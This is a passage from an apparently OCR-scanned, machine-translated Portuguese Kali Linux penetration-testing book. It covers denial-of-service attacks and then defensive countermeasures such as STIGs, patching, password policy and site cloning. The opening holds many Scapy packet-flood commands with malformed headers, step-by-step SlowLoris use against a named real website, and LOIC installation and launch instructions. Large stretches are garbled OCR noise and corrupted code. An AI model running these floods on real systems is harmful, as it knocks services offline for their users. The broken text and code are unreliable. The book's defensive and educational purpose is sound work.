ICMP Flood 
enviar (IP (dst = "10.0.0.1") / ICMP (), iface = "ethO", count = 2000) 
IP erro de checksum 


enviar (IP (dst = "10.0.0.1", src = "10.20.30.40", chksum = 0x5500) / 
TCP (dport = "www"), iface = "eth0", count = 2000) 


IP Fragment 


enviar (IP (dst = "10.0.0.1", src = "10.20.30.40", frag = 1) / TCP (dport = "www"), 
iface = "ethO", count = 2000) 


IP Comprimento> L2 
Comprimento 


enviar (IP (dst = "10.0.0.1", sre = "10.20.30.40", o DIH = 5L, len = 80) / 
TCP (dport = "www"), iface = "ethO", count = 2000) 


Fonte endereço IP == Destination Address 


enviar (IP (dst = "10.0.0.1", src = "10.0.0.1") / TCP (dport = "www"), 
iface = "ethO", count = 2000) 
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L2 Comprimento >> IP 
Comprimento 


enviar (IP (dst = "10.0.0.1", len = 32) / Raw (load = "bla-bla-bla-bla-bla-bla- 
bla-bla "), iface =" ethO ", count = 2000) 


enviar (IP (dst = "10.0.0.1", len = 32) / UDP (dport = 80, len = 48) / Raw (load = 
"Bla-bla-bla-bla-bla-bla-bla-bla"), iface = "ethO", count = 2000) 


enviar (IP (dst = "10.0.0.1", len = 32) / ICMP () / Raw (load = "bla-bla-bla-bla- 
bla-bla-bla-bla "), iface =" ethO ", count = 2000) 


No L4 


enviar (IP (dst = "10.0.0.1", sre = "10.20.30.40"), iface = "ethO," count = 2000) 


SYN && FIN Set 


enviar (IP (dst = "10.0.0.1") / TCP (flags = "FS"), iface = "ethO", count = 2000) 


TCP Header Length> L2 Comprimento 


enviar (IP (dst = "10.0.0.1", sre = "10.20.30.40") / 
TCP (dport = "www", dataofs = 15L), iface = "ethO", count = 2000) 


TCP Header Length Too Short (comprimento <5) 


enviar (IP (dst = "10.0.0.1", sre = "10.20.30.40") / 
TCP (dport = "www", dataofs = 1 L), iface = "ethO", count = 2000) 


SlowLoris 


Slowloris HTTP DoS 


OOCCTICOCCDOCCDDODOM FO FOF POLGODOCCTODOS PO COROLA ERREI FOGG DERCE HOLOODCococecc:: ++ 
DCOOCOOOOOCOOOOCOOUE ES E BEES BECODDOCODOUBS SELES SERES E REESE PRE E RRSsEREOOCCOOCOCr: |! 
COOCHIOOCOIOOCOD HLF F SOLES SD000D0CO DO LES SEBOS SLES D Loo Coot RSI BERT s00C200Cu : : 
DOC nO DODOE Bf E ES BERBER EOOOOOOCE E ERES ERR ES ICON IOCODO DON OOOO E E ERES EBRODOCO + + ++ 
Covo Coon COCOA SLI GS SLLESDOCES EL EO SH EOS SOLES LOCO CCT voc vv TTDOCES ELES Coca : 
2200 00000008 RFR RENE SERRO SERES PEER EROS E POROS ERROICO Osasco ss cosa CO E ERES ROC sor 
D9000D)0 BUS EERE S ERE? SECEOIBEES PODE S BO ES E pOJ ESS SOCODOUCOS | 1ODOO COD RUES BEBO 
SODOTODO BOI A? É POOOOOORR ROR E POCO IDOSO E ERGI BO so see s 4 + so COOIRES PRRD 
QOOCOOUOCESUCCODUE BF BUCOODOEBUB EEE E POCO OCCOCIIDES 5 H000000000c ff s | COOJUCUS É EO BOC 
DOCCODO SE LDOCCCO DOU FF DD0CD20000 PURO Pocos ces s006005200090C0090c . : secoTDDCCO tt dos 
DODOOD OE BOD OOOI E É ES ENOO O ao OIE ER Boo + + 200008 FEESOEEBDDO + coco ODONDIDDO E BO 
COCCO SUEBDOCCO SÉ PES DOCES: : scDOOEBBOC. +... += + «STODO0DD0CODOE . t comasTCTOD0000900 
OOOO E E EBSIDOOE É BR Soc: s s ODOEDEBC COD0OE É BOIS cr e ENNIO 
OOOUCOS SEVER BEEESEEBOO:. + «...CUBBSOC.. 
DOCAS PPRRGRERRREREMS: - oBRERO + ome. 
DM COOSCEESPOBESEEEOD. .O800. ,cOB BO: 
SoocCIOUFGGOcUOFOGOos:s... s> 100b0c. eus 
F90000900BS BOCOIB00C. t... 13. ,COBRECOC::.. b 
2 4 SEDOCEEUOBODOO0OOC: . +E +s e OJOO COOOOOc $ + + + ... 
«FE ODOSOCODDDONCE .. « FOCOBR Ef BEDICCoo saco re rr. 10000] t 
sss. 55 EE It E ECOCCDOCONOS COS TATE SE BODDOCIDICOCCS $ $+ 
. EE. SO BOOCOC OO BRDIOO RIO DOT or rar 1 


CE ES + e e SOOCDOO0OCOUOCOMNCODCOCOOS | EEELCOCS! LiBss css cost 
.- e scoocccoSteco: | HESCCCCS: | soci: 
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SlowLoris é um cliente HTTP baixa largura de banda que pode emitir ataques DoS. O que faz 
SlowLoris único é o seu método de atacar um alvo sem usar inundações comum 

técnicas. SlowLoris mantém conexões abertas através do envio de solicitações HTTP parciais. Ele 
continua a enviar centenas de cabeçalhos subsequentes em intervalos regulares para manter 
soquetes de fechamento. Este comportamento vai sobrecarregar os recursos do alvo, fazendo com 
que 

o incapaz de responder ao tráfego legítimo. Sites de alto tráfego pode levar um longo tempo 

para liberar soquetes disponíveis, porque os outros usuários devem terminar seus pedidos antes 
as tomadas se tornam disponíveis para SlowLoris para consumir. No entanto, SlowLoris 

acabará por inundar todos os soquetes disponíveis, matando serviço ao site da vítima. 


SlowLoris tira proveito de servidores que utilizam processamento de rosca, o que significa 
vulnerável a limitar a quantidade de rosca permitida. Exemplos incluem 
1.x Apache, 2.x, dhttpd, GoAhead, e assim por diante. 


Não SlowLoris não vem instalado no Kali Linux. Você pode baixar a partir de SlowLoris 
http://ckers.org/slowloris 


Para executar SlowLoris, baixe o . PI script e abrir um terminal de comando. Ir 
para a pasta com o script e digite: 


perl slowloris.pl 


Isso fará com que o ecrã principal. Para executar SlowLoris em um alvo, digite o 
mesmo comando seguido de -Dns e seu alvo. Por exemplo, para atacar 
www.thesecurityblogger.com, Digite: 


perl slowloris.pl-dns thesecurityblogger.com 


Ataques na Web 


Você vai ver SlowLoris consumir soquetes disponíveis, o que acabará por levar para baixo 
seu alvo: 


a CCOOCC:. 


Slowloris the Low bandwidtt 


cal e 


efaulting to port 80. 

efaulting to a 5 second tcp connectior 

sfaulting to a 166 
Defaulting to l¢ 
Multithreading abled. 

connecting to thesecurityblogger.com:8@ every 106 Inds with 1000 


Building so 
Building socke 
Building socke 


Building 


Se SlowLoris é capaz de fazer a sua magia, o seu alvo ficarão indisponíveis: 


It's not just you! www.thesecurityblogger.com looks down from 
here. 


DoS exemplo ataque www.thesecurityblogger.com (Por favor, não 


a 
[ V> teste contra este site) 


Low Orbit lon Canhão 


Low Orbit lon Canhão (LOIC) é uma ferramenta de teste de estresse de rede, o que significa que é 
projetado 

para testar a quantidade de tráfego de um alvo pode manipular para o planejamento de expectativas 
futuras de recursos. 

O software tem inspirado outros softwares similares, tais como JavaScript, LOIC, que 


CPO HAT SES HERS RUE RAAN NNAS S a RNENSE.. 
contra vários sites, incluindo algumas entidades públicas muito conhecidas. Alguns 
argumentação jurídica foram feitos que LOIC é semelhante a ir a um site vários 

mil vezes, no entanto, alguns grupos de policiais americanos tratam o uso de 

LOIC como uma violação da lei de segurança de computador e fraude. 
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Para instalar o LOIC, Abra uma janela de terminal e digite: 


apt-get update 
aptitude install git-core monodevelop 


apt-get install mono-gmcs 


g will $ 
libart 


Libac ort 
gladeZ.( 


bgnome -v fs2 


mono-qmes 


Uma vez que seja completa, vá para o diretório desktop usando cd / Desktop e criar um 
pasta chamada loic usando o seguinte comando: 


mkdir loic 
# p W d 


# mkdir Loic 


Navegue até a pasta usando cd / loic e digite o seguinte comando: 


wget https://raw.github.com/nicolargo/loicinstaller/ master / loic.sh 


Em seguida, dar permissões para o arquivo de script usando o comando: 


loic.sh chmod 777 


# chmod 777 loic.sh 


O último passo é executar o script usando o seguinte comando: 


. / Loic.sh instalar 


c# ./loic.sh install 
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Se você não receber quaisquer mensagens de erro da execução do script, então você está pronto 
para 

atualizar loic. Para atualizar, use o seguinte comando: 

. / Loic / update sh 


File Edit View Search Terminal Help 


Finalmente, é hora de lançar LOIC. Você pode fazer isso usando o seguinte comando: 


. / Loic.sh prazo 


Low Orbit lon Cannon | U dun goofed |v. 1.1.1.26 


sot) 01 


IMMA Ct 


U dun gooted 


Usando LOIC é simples. Você pode selecionar se você gostaria de usar o modo manual 
ou Modo de IRC. Vamos escolher o modo manual para o seguinte exemplo. 


Em seguida, você pode escolher o URL ou endereço IP que pretende inundar. Vamos usar o IP 
endereço 127.0.0.1 por exemplo, o seguinte. LOIC oferece opções de ataque, se você gosta 
para modificar as configurações de TCP ou UDP. 
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Quando você estiver pronto para lançar o seu ataque, pressione o botão de IMMA CHARGIN 
MAH LAZER. LOIC mostrará o ataque está em andamento. Clique no Pare de Inundações 
botão para parar o ataque: 


PC sever 
O Maud Mode(Dok yoursett) @ EC voce (Pereira) = Jescomeces 


3 Peasy? 


no IMMA CHARGIN MAH LAZER || 
P 775401 | 


SELIC) lage 


127.0.0.1 


TCP) LOP macnn 
U an gota 
4 shwe => 
HI seas 
r j] Wet te recy 
Pj ine Com tte 
BB Aneri randon chars tote mutate | nessa 


ATX’ te 


kie Commenting Prqusrg Dowrioading 


d Gti conhirwEral ache toci 


Outras 
ferramientagas ferramentas que podem ser úteis para ataques baseados na web. Aqui 


estão 
algumas ferramentas adicionais disponíveis em Kali Linux que não foram cobertos e poderia 


ser usado para testes de penetração remoto. 


DNSCHEF 


DNSChef é um proxy DNS para Penetration Testers e malware analistas. Um DNS 

proxy também conhecida como "DNS Falso" é uma ferramenta utilizada para o tráfego de rede 
aplicação 

análise e outros casos de uso. Domain Name System (DNS) é uma nomenclatura distribuído 
sistema para computadores, serviços ou qualquer recurso conectado à Internet ou privada 


rede. Fornecer endereços DNS falsos podem redirecionar o tráfego para outros locais desejados. 
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Por exemplo, uma procuração DNS pode ser utilizada para pedidos de falsos badguy.com apontar 
uma máquina local para a rescisão ou interceptação em vez de uma série de verdade em algum 
lugar 

a Internet. Para que isso funcione, você precisa ter acesso e modificar as entradas DNS em um 
único servidor ou veneno real DNS para que o tráfego chega ao servidor Kali Linux. O 

DNSChef ferramenta é fácil de usar, no entanto, o desafio é o método de ataque de DNS para 
direcionar o tráfego para Kali Linux. 


SniffJoke 


SniffJoke lida com a sua conexão TCP transparente, proporcionando atraso, modificando 

e injetando pacotes falsos dentro de sua transmissão. Este processo faz com que seja extremamente 
difíceis para uma tecnologia passiva escutas telefônicas como um IDS / IPS ou sniffer para 
interpretar correctamente o tráfego. Isto é feito através da exploração do que se presume registada 
por um sniffer e que é transmitido pelo cliente, fazendo com que este inconsistente para o 

algoritmo de remontagem pacote. Os próximos dois diagramas de mostrar o tráfego de escutas 
telefônicas 

entre dois usuários sem e com SniffJoke. 
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Cerco 


Siege é um HTTP / HTTPS utilitário testes de estresse projetado para desenvolvedores web 

medir o desempenho do seu código sob coação. Siege oferece multi-thread 

Testes de carga HTTP e benchmarking por bater um servidor web com um configurável 

número de concorrentes, os usuários simulados. Siege oferece uma regressão, simulação Internet 
e modos de força bruta. 


Você pode encontrar sob cerco Teste de Estresse |Testes de stress de rede |Siege: 


VERSION, prints the version number. 
HELP, prints this section. 
“CONFIGURATION, show the current config. 
VERBOSE, prints notification to screen. 


GET, pull down HTTP headers and display the 


Great for application debugging. 


- Da dese vi) 
Lng where 


H, one ho 


Para executar Siege, digite o seguinte comando: 


cerco [opções] <target URL> 


A imagem seguinte mostra a execução cerco contra www .thesecurityblogger. 
com. À contagem de usuário padrão é 15, como mostrado na imagem. Quando você parar o 
Testes de Siege, a ferramenta fornece um teste de estresse pós-relatório da seguinte forma: 


:~# siege www.thesecurityblogger.com 


t* SIEGE 2-70 


** Preparing 15 concurrent users for battle. 
The server is now under siege... 
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_ifting the server 


ransacTions: 


Successful tran 
ailed transacti 


/var/log/siege. lo 
disable this annoying message by editing 
-Ssiegerc file your home-directorys c hange 
» directive 'show-logfile' to false. 


Inundator 


Inundator é uma ferramenta que foge Sistemas de Intrusão detecção (IDS) e Intrusion 

Sistemas de Prevenção (IPS) por inundar seus arquivos de log. O conceito é que você pode 

quer inundar um alvo com falsos positivos, assim você pode se esconder de um ataque real a partir 
de um 

reação e ponto de vista forense. Inundator também pode ser usado para testar a eficácia 

do sistema de alerta de suas ferramentas de relatórios de segurança, como SIEM e IDS / IPS. 


TCPReplay 


TCPReplay utiliza tráfego previamente capturado em libpcap formato para testar uma variedade de 
dispositivos de rede. TCPReplay pode classificar o tráfego como cliente ou servidor, reescrita Camada 
2, 3 e 4 cabeçalhos e repetir o tráfego de volta para a rede, bem como através de 

outros dispositivos, tais como switches, roteadores, firewalls e IDS / IPS. TCPReplay apoios 

modos NIC simples e dupla para testar tanto sniffing e dispositivos embutidos. 


Basicamente, TCPReplay pode capturar o tráfego entre o cliente eo servidor, e reproduzi-lo 
qualquer ponto da rede. 
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Resumo 


Este capítulo termina revendo vários métodos disponíveis em Kali Linux 1.0 que 

poderia ser usado para realizar testes de penetração contra servidores de aplicativos web. Em 
Neste ponto, os leitores devem saber como pesquisar um alvo, identificar as vulnerabilidades 
nesse alvo, bem como todas as interações associadas com host e clientes, explorar 
vulnerabilidades, e serviços de interrupção, se desejar. Este texto é uma breve visão geral das 
ferramentas 

disponível em Kali Linux, no entanto, existem muitas outras ferramentas além Kali Linux 

que devem ser incluídos em seu arsenal Teste de Invasão. Kali Linux oferece uma série 

de valor, com conjuntos de ferramentas nativas, no entanto, as melhores ferramentas de alavancagem 
Penetração Testers 

além de Kali, tais como ataques do tipo Zero Day baseados em scripts e utilitários personalizados. 
Nós 

recomendar pesquisando e testando várias ferramentas para métodos de ataque abordados neste 


EMO CABRIO Eoncentra na Riemnicação é exploração de vulBrabildades remotamente como 


relacionada a ataques baseados na Internet. Cobrimos ataques de exploração do navegador, Proxy 
ataques, e colheita de senha. Concluiu-se com os métodos para interromper serviços 

como um meio de aplicações web de teste de estresse, bem como identificar o quão vulnerável 
alvos são a ataques Dos. 


O próximo capítulo vai mudar de marcha, olhando para como se defender de aplicações web 
utilizando ferramentas disponíveis no Kali Linux 1.0. 
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Contramedidas defensivas 


Até este capítulo, nós cobrimos como usar Kali Linux para comprometer as metas. 

Agora é hora de trocar as marchas e se tornar o zagueiro com o objetivo de evitar 

sendo comprometida por métodos que têm demonstrado neste livro, bem como 

outras formas de ataque. Defendendo um recurso voltado para a Internet é extremamente difícil, 
com base no que está sendo exposta a todo o mundo através de acesso público, misturado com o 
operações exigência de não ser capaz de impactar o serviço a usuários confiáveis a um custo 

de segurança. E absolutamente crítico para incluir a segurança em todo o ciclo de vida de 
concepção até a rescisão do público enfrenta qualquer coisa, em vez de considerar a segurança 
como uma reflexão tardia. Isto não só irá reduzir o risco de ameaças contra o serviço, 

mas também é provável ser menos caro para remediar, no caso de um incidente cibernético. 


É do conhecimento comum que existem pessoas más sistemas de ataque sobre a 
Internet, independentemente da natureza do negócio. Como uma medida contra defensiva, 
organizações depositam sua confiança em soluções para defesa contra essas ameaças cibernéticas. 


problema com essa estratégia é o vendedor não é vítima de um ataque e não 

absorver os danos de um incidente cibernético. Os vendedores vão oferecer proteção, no entanto, 
eles não podem ser responsáveis por qualquer coisa fora do controle do seu produto. Tudo o que 
precisamos 

é uma falta de atualização, erro de configuração, ou milhões de situações que podem causar uma 
brecha para que o vendedor não será responsável. Além disso, muitas organizações de alavancagem 
soluções de vários fornecedores que não compartilham de inteligência de segurança, fazendo o 
possível para 

responsabilidade a ser passado para trás e para frente entre os fornecedores. Por estas e outras 
razões, 

recomendamos aos clientes tomar posse a responsabilidade de proteger os ativos por 

sistemas de endurecimento das ameaças. 


Contramedidas defensivas 


Kali Linux é uma ferramenta principal teste de penetração que podem ser utilizados para identificar 
onde 

sistemas são vulneráveis a ataques. Ao invés de atacar um alvo, recomendamos 

Penetração Teste seus próprios ativos de rede para identificar as vulnerabilidades antes de um 
indivíduo mal-intencionado bate-lhe a ele. Para citar Sun Tzu a partir de A Arte da Guerra: 


"Se você conhece o inimigo e conhece a si mesmo, você não precisa temer o resultado 
de um 

cem batalhas. Se você se conhece mas não o inimigo, para cada vitória ganha 

você também vai sofrer uma derrota. Se você não conhece nem o inimigo nem a si 
mesmo, você vai 


Nós SUCH smirdas ARH BL BBnceitos fundamentais sao verdadeiras; usar Kali Linux para 


conhecer a si mesmo, 

e conhecer a sua fraqueza. 

A vantagem que vocé tem é que vocé sabe que esta acontecendo, vocé pode usar e extrema 
medidas sem a preocupação de acionar alarmes. Normalmente, os hackers não vai arriscar 
expondo-se, reduzindo as suas opções para o ataque. Discrição requer paciência, 

toque mínimo para o alvo, e muito planejamento. E até você para capitalizar sobre o seu 
capacidade de investir tempo e recursos adequada em segurança antes que alguém investe 


mais em atravessá-lo. Um ditado comum entre os autores deste livro é "99 por cento 
seguro é um inseguro 100 por cento ". 


Este capítulo irá fornecer diferentes métodos de utilização de Kali Linux para auditar o seu web 
aplicativos para vulnerabilidades comuns, bem como outras melhores práticas para o endurecimento 
sua rede. Nós vamos cobrir as linhas de base de segurança, gerenciamento de patches, password 
políticas, e defender-se contra os métodos de ataque, cobertas nos capítulos anteriores. 

Este capítulo também inclui uma seção focada em usar Kali Linux em um forense 

investigação. Forensics é importante depois de identificar que sua aplicação web ou 

outros ativos ter sido comprometida, para evitar futuras impacto negativo. 


Testando suas defesas 


Como explicado na introdução, a melhor abordagem para endurecer a sua defesa é 

atacando seus controles de segurança existentes, com o objetivo de identificar fraqueza. 
Alguns conceitos-chave a considerar ao desenvolver uma estratégia para testar seu cibernético 
defesas de segurança são os seguintes: 


e Preto, branco, cinza ou abordagem chapéu? 
e Teste uma cópia ou o sistema real? 
e Possíveis riscos de Teste de Invasão? 


* Quem deve ser informado? 
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e Você está testando detecção e resposta a ameaças ou focando 
identificação de vulnerabilidades? 


e Sao todos os padrões de conformidade a ser considerada? 


Vejamos que estabelece um plano para validar a nossa segurança. Primeiro precisamos 
conhecer a nossa linha de base para a segurança, por isso sabemos o que para validar 
contra. 


Segurança da linha de 


DAS gunta comum feita por especialistas do setor é o que deve ser o mínimo 

nível aceitável de segurança. Muitas organizações devem estar em conformidade com 
mandatos especificados por sua indústria e do governo. Qualquer sistema de aceitar 
pagamentos devem aderir ao Payment Card Industry Data Security Standard 

(PCI DSS). Ambientes de saúde deve atender Seguro de Saúde Portabilidade e 
Responsabilidade normas (HIPAA). Mandatos comuns, como estes são cobertos 

em Capítulo 8, Relatório Executivo teste de penetração, são impulsionadores de negócios 
populares para 

mostrando valor para os serviços de testes de penetração. 


Fora dos mandatos, um bom ponto de partida para o estabelecimento de uma linha de base para a 
segurança 

está analisando como outras agências de proteger seus sistemas. Como consultores de segurança 
para 

Clientes americanos, identificamos como o governo dos Estados Unidos assegura sensível 
informação como um exemplo para a segurança da linha de base. A maioria das organizações norte- 
americanas seria 

estar interessado em ter padrões de segurança semelhantes como a Casa Branca. Esta mesma 
conceito pode ser aplicado a outros padrões de TI país, a segurança organismo específico 
melhores práticas, ou controles militares recomendadas de segurança. Há também as melhores 
práticas 

RAIADS RATNARS dlnasananan a ublicasdona aestiraleçarganipaçãess mada HeY NREL e 
desti a uma na l no 

KRED APSTAGA: Perge Internacional de Normalizagao (ISO). 


Sua linha de base para a segurança deve ser o nível mínimo absoluto de segurança 
M utilizado em seu ambiente. A melhor prática é assegurar sistemas além do 
D linha de base, porque as linhas de base de segurança como mais documentados são 
“o limitados, devido 
a data de publicação, a influência dos partidos de financiamento, e outros elementos. 


[253] 


Contramedidas defensivas 


STIG 


AGuia de Segurança Técnico de Implementação (STIG) é uma metodologia para 
instalação e manutenção do software de computador seguro e padronizado 

hardware. Este termo foi cunhado pelo Agência de Defesa de Sistemas de Informação 
(DISA), que cria documentos de configuração em apoio da Organização das Nações 
Unidos Departamento da defesa (DOD). As diretrizes de implementação incluem 
processos administrativos recomendadas e controles de segurança utilizados durante o 
ciclo de vida do ativo. 


Um exemplo onde Stigs seria de benefício está na configuração de uma área de trabalho 
computador. A maioria dos sistemas operacionais não são inerentemente seguros, deixando-os 
vulneráveis 

para os criminosos. A STIG descreve como minimizar ataques baseados na rede e prevenir 

o acesso ao sistema quando o invasor está presente no dispositivo. Stigs também descrevem 
processos de manutenção, tais como atualizações de software e patches vulnerabilidade. 


Stigs são grandes diretrizes para proteger os sistemas operacionais, dispositivos de rede, e 
aplicações. Você pode baixar diretrizes STIG de http://www.stigviewer. 

com.br / Stigs. Você vai encontrar documentos STIG contêm guias passo-a-passo para o 
endurecimento 

uma variedade de sistemas, incluindo servidores web. Além disso, as diretrizes STIG são um ponto 
de partida 

apontam para a configuração de sistemas para atender a vários padrões de conformidade 
regulamentar. 

Para Estados Unidos funcionários federais, Stigs são necessários para os sistemas em redes 
contgelado pelo Departamento de Defesa e outras organizações governamentais. 


at Existem muitos outros recursos disponíveis para encontrar segurança 
modelos de normalização. Exemplos são o Center for Internet 
sS Segurança (CIS) e Cisco Protection Network Foundation (NFP). 


O gerenciamento de 


anes direcionados e vulnerabilidades de dia zero, reduzindo a janela de tempo 
ntre o momento em que uma vulnerabilidade é divulgada e os atacantes desenvolver um exploit, 

é 
tornando-se mais compete gerentes de segurança de entender os ativos em sua 
Ambiente de TI, e os níveis de correção desses sistemas. Gerenciamento de patches é um 
processo contínuo e só pode ser bem sucedido se houver um método para identificar quando 
um patch está disponível, priorizar quando implementar o patch, validá-lo sobre 
o cumprimento do negócio, e como reagir quando um patch não está disponível para um 
conhecido 
vulnerabilidade. Isso vale também para aplicações dentro dos sistemas e software, tais 
como plugins. 
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Gerenciamento de patches é apenas um aspecto do ciclo de vida maior vulnerabilidade. O primeiro 
passo é identificar as vulnerabilidades, o que pode ser feito através de atualizações do fornecedor ou 
serviços que vão da verificação periódica de testes de penetração de hardcore. Lá 

deve ser uma política que explica como muitas vezes diferentes níveis de exames são realizados 
assim como quem é o responsável para analisar as ameaças que são encontrados. Um bom ponto de 
partida 

para estabelecer uma linha de base para a frequência de varredura de vulnerabilidades está revendo o 
que 

padrões de conformidade regulamentar que deve seguir, como muitos incluem língua em torno de 
varredura de vulnerabilidades internas e externas. 

O segundo passo para o gerenciamento de patches está reagindo aos sistemas identificados como 
vulnerável. Como explicado em Capítulo 1, Teste de Invasão e configuração, sendo 

vulnerável não significa necessariamente que há um risco a menos que a vulnerabilidade é 

validada através da exploração, durante um teste de penetração ou outro método. 

Protegendo a vulnerabilidade pode simplesmente exigir um patch ou atualização, no entanto, 

algumas vulnerabilidades podem exigir mais investimento em tempo e trabalho para remediar. 
Cálculo do risco associado ao investimento para remediar entra em jogo 

para estas situações. 


O passo final no gerenciamento de patches está programando o patch que se refere à 

como crítica a vulnerabilidade é a operações comerciais. Esta é uma chave, como muitos 

sistemas comprometidos poderia ter sido salvo se fossem corrigidas antes de ser 

identificado por um partido malicioso. Nós encontramos muitos dos nossos clientes têm manutenção 
janelas programadas em uma base mensal ou mais para o gerenciamento de patches, que 

deixa uma grande janela de tempo para serem expostos, no caso de um sistema se torna 
vulnerável a ataques. A melhor prática é a atribuição de um especialista Information Assurance 

da responsabilidade do cálculo do risco associado com sistemas identificados como 

vulneráveis, bem como ter a autoridade para janelas de manutenção quando um trunfo 

ameaça atinge um determinado nível de risco para as operações comerciais. 
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Gerenciamento de patches é uma das melhores estratégias de defesa para evitar muitos dos 
ameaças apresentadas neste livro. Certifique-se de rever como a sua organização 

lida com o gerenciamento de patches periodicamente para evitar ser vítima de expor uma 
sistema vulnerável que poderia ter sido assegurada. Isto deve aplicar-se a todos gerenciados 
ativos, incluindo servidores e aplicações web. 


As diretivas de senha 


Em geral, ter uma política que controla os resultados possíveis pode impactar negativamente 

a força de palavras-passe. Independentemente da política, os usuários terão pela natureza humana, 
tente 

para simplificar as senhas de qualquer maneira, possivelmente usando caracteres repetidos, 
previsível 

comportamento, como o uso de 12345 para estender o comprimento de uma senha, ou outros meios. 
Os usuários também normalmente não alterar senhas a menos que forçado por um sistema. Para 


estes l ; l 
razõés, WAppesucuma valas eseginreaa IAglintes orientações: 


e Não permitir que as últimas cinco senhas como substitutos 
e Aplicar um comprimento de pelo menos 12 
rpraçieres na 
e ao limitar quaisquer caracteres, como caracteres especiais 
* | Mandato pelo menos uma letra maiúscula, número e caractere especial 


e Avisar ou negar dígitos repetição como 12345 ou asdfg para evitar 
ataques de força bruta 


Processamento do computador está constantemente a melhorar, o que significa 12 
caracteres 
senhas não será forte no futuro próximo. Um artigo recente 
i publicado na primavera de 2013, afirmou uma equipe de hackers rachado mais de 
a> 14.800, de 16 caracteres senhas hash criptograficamente de uma lista 
de 16.449. Este é um caso especial no momento da publicação, no entanto, 
será o campo de batalha comum para hackers futuras. Considere o 
comprimento recomendado de uma senha de um alvo em movimento. 


Os autores deste livro são fas de gerador de senha por Steve Gibson, como um seguro 
método de geração de senhas aleatórias. O gerador de seguro senha aleatória 

por Steve Gibson pode ser encontrado no Centro de Pesquisa Gibson em: https:/Awww.gre.com/ 
passwords.htm. 
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Muitos sites e aplicações web são comprometidas, porque web 

desenvolvedores implementados protocolos de segurança pobres. Os desenvolvedorel da 
Web 

deve usar criptografia forte para armazenar senhas de usuários e dados. 

As senhas devem implementar hashing e salga técnicas para promover 

mitigar os riscos em dados roubados ou perdidos. 


Você pode avaliar a força das senhas usadas em sua alavancagem sistemas 

ferramentas de quebra de senha abordados Capítulo 3, os ataques lado do servidor, e Capítulo 4, 
Os ataques do lado do cliente deste livro. Ferramentas sugeridas são John the Ripper, Johnny, 
Hashcat, oclHashcat, e Ophcrack. Trituração e Hashcat pode também ser usado para 

gerar listas de senhas para que possam comprovar a força de sua política de senha. 


AL Existem sites disponíveis, como Crackstation, que oferecem pré-gerada 
f >) listas de senhas populares. Você pode usar estas listas para testar a força da 
Sá suas senhas e políticas. 


Espelhe o seu ambiente 


Antes de testar um sistema contra uma configuração de segurança recomendada, a verificação de 
vulnerabilidades, ou validação de um sistema vulnerável através da exploração, pode 

fazer sentido para clonar o sistema para fins de teste, em vez de testar o real 

sistema. As melhores práticas são replicar tudo, desde o hardware de hospedagem na web 
aplicação a todo o conteúdo, porque pode existir vulnerabilidades em todas as camadas de 
tecnologia. 

Testando um ambiente clonado vai dar a liberdade Tester Penetração para executar 

qualquer grau de ataque, evitando impacto negativo às operações. Embora a maioria 

as pessoas não podem espelhar o ambiente exato, geralmente é possível a criação de um virtuais 
ambiente com a mesma funcionalidade. 


HT Track 


HT Track é um utilitário de navegador offline livre. HT Track permite que você baixe um site 

a partir da Internet para um diretório local, construir todos os diretórios, captura de HTML, imagens, 
e outros arquivos a partir do servidor e armazenar em seu computador. Você pode navegar na 
clonado 

link do site-to-link, bem como testá-lo em busca de vulnerabilidades. HHTrack é extremamente 
ferramenta simples para trabalhar com sites básicos. Não vai replicar o conteúdo dinâmico, nem 
será que vai replicar site middleware, tais como bancos de dados. Por isso, pode não ser 
apropriada em todos os ambientes de testes de penetração. 
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Para testar todos os aspectos de um site, você terá que usar outro software para 
sv clonar um alvo. Esse software deve incluir a captura de middleware e 
\ 1 conteúdo dinâmico, bem como, possivelmente, exigir acesso de administrador 
\ direitos sobre o alvo. 


No momento da escrita, HTTack já não vem pré-instalado com Kali. Para instalar 
HTTack, abrir um Terminal janela e tipo apt-get install httrack. Uma vez 
a instalação estiver concluída, você pode iniciar HTTrack, abra um Terminal e tipo httrack. 


Você será solicitado a dar um nome de projeto, o caminho para instalar o site (o padrão é 

root / sites /) E URLs para copiar. HTTrack dá algumas opções para copiar o seu 

alvo (s), conforme mostrado na tela a seguir. Algumas perguntas opcionais adicionais 

está definindo wildcards e nível recursivo. Nós selecionamos a opção 2. Depois de responder a 
perguntas, selecione Yclonar o seu alvo (s). 


4 Advie O B J 
2 option List, onto a blank lina or try ħhttrack 


nje t name : Dj Shadow 


e path (retum=/root/websitas/) 


HT Track vai começar a clonar o seu alvo e todos os links associados. Pode demorar um pouco para 
concluído, dependendo do tamanho do seu alvo. A próxima imagem mostra HT Track 
clonagem www.thesecurityblogger.com. 


with the wizard half 
g=advanced-pars 


ant /uplo: 
/upLoé 


t/uplo: 
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Navegue até a pasta que você especificou para salvar as metas clonados para iniciar o seu teste. 


< Edhome websites 


backblue.gif 
thasecu tyblogget 


com 


hts-in_progress, lock hts-log txt index.htm 


Outras ferramentas de 


elo Frage algumas ferramentas de clonagem de sites disponíveis na Kali Linux. Mais 
uma vez, 

essas ferramentas não irá replicar o conteúdo dinâmico, nem irão replicar site 

middleware, tais como bancos de dados. Portanto, eles não podem ser apropriados em todos 
Ambientes de teste de penetração. 


e WebCopier: É uma ferramenta que clona um site para avaliação off-line, tais 
como testes de penetração. 


* w3mir: É uma cópia HTTP para todos os fins e ferramenta de espelhamento. A 
principal 
foco de w3mir é criar e manter uma cópia navegável de um, ou 
vários, sites WWW remotas. 


Man-in-the-middle defesa 


Ataques man-in-the-middle são difíceis de proteger contra. O ataque acontece fora 

de ambiente controlado da vítima e, quando executado corretamente, não deixa um 

assinatura óbvio que alertar as vítimas envolvidas. MITM é tipicamente o primeiro passo de 

um ataque mais sinistra como tira SSL. Uma maneira comum de se proteger contra MITM 

é garantir sites usam SSL / TLS 3.0. Em outras palavras, certifique-se os sites são 

acessada usando HTTPS ou conexões seguras HTTP. Verificando HTTPS não é tão fácil 

como a procura de um pouco de barra de endereços verde com um símbolo de bloqueio, porque os 
atacantes podem 

servir certificados das vítimas para fazer parecer que a sessão é segura. 
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Para testar adequadamente uma sessão HTTP, examinar o certificado e olhar para o certificado 
autoridade. Este esforço adicional desencoraja muitos usuários de verificar um seguro 
sessão, o que torna este método de ataque muito eficaz. 


Ls Equifax Secure Certificate Authority 
te [J] Google internet Authority 


- @ mail.googiecon 


mail.google.com 
Issued Oy, Google Internet Authority 
Expires: Thursday, October 31, 2013 6:59:59 PM Central 


Daylight Time 
© This certificate is valid 


> Details 


A figura anterior mostra um certificado SSL para o Gmail foi emitida pelo Google 

